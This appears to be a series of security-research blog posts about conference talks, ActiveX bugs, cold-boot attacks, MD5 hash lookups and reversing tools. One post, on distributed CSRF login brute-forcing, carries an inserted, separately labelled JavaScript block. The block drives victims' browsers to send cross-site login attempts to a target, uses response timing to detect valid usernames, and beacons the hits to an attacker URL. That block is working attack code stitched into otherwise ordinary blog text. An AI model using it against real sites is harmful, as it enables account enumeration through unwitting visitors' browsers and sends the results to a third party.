Hey guys..
Most of our BlackHat/Defcon team has arrived back home in one piece.. I landed with a fever and a lost voice (but to be honest I already caught something while in Vegas!)
We will post some post-Vegas thoughts as soon as the dust settles, but I also promised:
The slides from our talk
The tools we released…
A link to the slides is here: [Pushing a Camel through the eye of a Needle]
Some of the DC16 speaker summaries have been posted, and these two caught my eye:
Time-Based Blind SQL Injection using heavy queries
New Tool for SQL Injection with DNS Exfiltration
Both descriptions seem pretty much spot on with what we did in our DefCon talk last year..
Hmm.. I wonder if it's new twists on it, or a little more of the same?
/mh
Earlier this week we had an internal presentation on Attacking ActiveX Controls. The main reason we had it is the ridiculously high hit rate we get whenever we look at controls with a slight security bent.. When building the presentation I dug up an old advisory we never publicly released (obviously we reported it to the vendor, who (kinda) promptly fixed the bug, without giving us any credit at all, but hey..)
While the IEBlog promises updates to IE8 that will minimize the damage caused by owned controls in the future, the fundamental problems with ActiveX today are an attacker's dream.
So Felten et al. basically figured out that cooling DRAM chips allows an attacker to move them to another machine, where their contents can be leeched!
The geek in me can't help but say “COOL!”
According to the comments posted (by Eugene Spafford, no less) this sort of attack is fairly well known.. but.. for this humble fanboy, I think it's still pretty rocking!
Rob had a rant on his site on the timing attack, with a CSRF twist.. We met him after our Vegas talk, but I'm not really sure how his attack differs from our published one..
My on-list response:
-snip-
From: haroon meer
To: bugtraq@cgisecurity.net
Cc: websecurity@webappsec.org
Subject: Re: [WEB SECURITY] Performing Distributed Brute Forcing of CSRF vulnerable login pages

Hi Robert..
Thanks for the kind words on the talk.. If you check out the Visio at: http://www.sensepost.com/blogstatic/2007/08/dxsrt.png you will see that it's pretty much the same attack.. In a shameless display of self-pimpage, check out the paper http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf from page 12.. Figure 23, for example, shows the results in a victim/zombie's browser after he has visited our page.. Effectively he tries the userlist we send him (in this case on a standard SquirrelMail login page). Once he detects a timing diff (again using a trivial algorithm to avoid latency disparity) he simply makes another request to the attacker to report his success..
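The attack described in the mail above, as an added example in JavaScript (this is not code from the original post or from the squeeza paper): a victim's browser is handed a userlist, times a login attempt per name, picks out the names whose response is slower, and beacons the hits back to the attacker. The "trivial algorithm to avoid latency disparity" is taken here to be: interleave the usernames across several rounds, keep the median per user, and compare it against the median across all users (most guesses are invalid, so that median tracks the invalid-user cost). The round count, the threshold ratio, the login form field names and the attacker URL are all assumptions for illustration.

```javascript
// Added example, not the original post's code. Assumed parameters:
const ROUNDS = 5;            // measurements per username (assumption)
const RATIO_THRESHOLD = 1.5; // hit when a user's median is this much slower than the baseline (assumption)

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 === 1 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// samples: { username: [elapsedMs, ...] } -> usernames whose median latency
// stands out from the baseline. Using the median rather than a single
// attempt is what makes one jittery request not look like a hit.
function classifyTimings(samples, ratio = RATIO_THRESHOLD) {
  const perUser = Object.entries(samples).map(([user, ms]) => [user, median(ms)]);
  const baseline = median(perUser.map(([, m]) => m));
  return perUser.filter(([, m]) => m > baseline * ratio).map(([user]) => user);
}

// Collect timings round-robin, so a burst of network jitter lands on every
// username roughly equally instead of on whichever name was being tried.
// attempt(user) must resolve once the login response has arrived.
async function probeUsers(users, attempt, rounds = ROUNDS) {
  const samples = Object.fromEntries(users.map(u => [u, []]));
  for (let r = 0; r < rounds; r++) {
    for (const user of users) {
      const start = Date.now();
      await attempt(user);
      samples[user].push(Date.now() - start);
    }
  }
  return samples;
}

// Browser side: one cross-site POST of the login form per attempt (the CSRF
// part). The response body is unreadable cross-origin, but its timing is not.
// Field names below are assumptions; use the target form's real ones.
function makeBrowserAttempt(loginUrl) {
  return user => fetch(loginUrl, {
    method: 'POST',
    mode: 'no-cors',
    credentials: 'omit',
    body: new URLSearchParams({ username: user, password: 'x' }),
  }).catch(() => {});
}

// Report hits to the attacker with a plain image beacon; no CORS needed.
function reportHits(attackerUrl, hits) {
  for (const user of hits) {
    new Image().src = attackerUrl + '?u=' + encodeURIComponent(user);
  }
}

// Driver as the attacker's page would call it (URLs are placeholders).
async function runProbe(loginUrl, attackerUrl, userlist) {
  const samples = await probeUsers(userlist, makeBrowserAttempt(loginUrl));
  const hits = classifyTimings(samples);
  reportHits(attackerUrl, hits);
  return hits;
}
```

Only classifyTimings, median and probeUsers are needed to reproduce the detection offline; makeBrowserAttempt and reportHits use browser globals (fetch, Image) and are there to show where the cross-site request and the report-back request sit.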
OK.. so it was a long time ago, and old code is supposed to embarrass you.. but I pulled casper.exe from our webpage today to test something for the project I'm on..
Interestingly it runs pretty OK, and actually doesn't look from the outside as ugly as it is underneath..
If you have never used casper, take it for a quick spin.. if nothing else you will be surprised by how many invisible windows currently live on your desktop..
Slashdot picked up on the blog post from Light Blue TouchPaper commenting on the fact that a researcher was surprised to discover that simply putting an MD5 hash into Google returned a hit mapping it to the original word..
This is an interesting concept.. A while back, we decided to fiddle with the idea of using Google's indexing and spidering as a new take on the time/space trade-off for password cracking..
These days it's almost impossible to read a book on security or vuln-dev without a gratuitous IDA Pro screenshot. IDA has proven itself so valuable at reversing that it's near impossible to find texts that fail to mention it. (Even ancient texts from Fravia and Woodman make reference to it.)
Well.. for a long, long time people have wondered why Ilfak (IDA's main author) didn't get into the point-and-click vuln finding / point-and-click disassembler business.. For a long time he (and DataRescue) stayed out of it, till now..
In early 2002 I suggested that we could solve some computer problems and South Africa's street-kid problem by setting up a network of street kids with basic education to handle tasks computers still struggled with. At the time we were concerned with low-false-positive, agentless remote detection of defaced web sites, but we also ran into the idea when we first built e-or, our early web application scanner. I suspect I didn't broach the subject with enough sensitivity (and in retrospect, suggesting that remote controls for automatic gates could be replaced by two low-cost street kids (one as a spare) might not have helped my cause..)
Steven Murdoch over at Light Blue TouchPaper did an investigation into the Privila internship program.. What was also cool, however, was that he threw together a quick visualization of the data.
Moving graphs are always cool, and the fact that he got it together so quickly was impressive.. A quick check shows that he used the Prefuse toolkit, a BSD-licensed visualization toolkit that looks simple to use, with some awesome examples..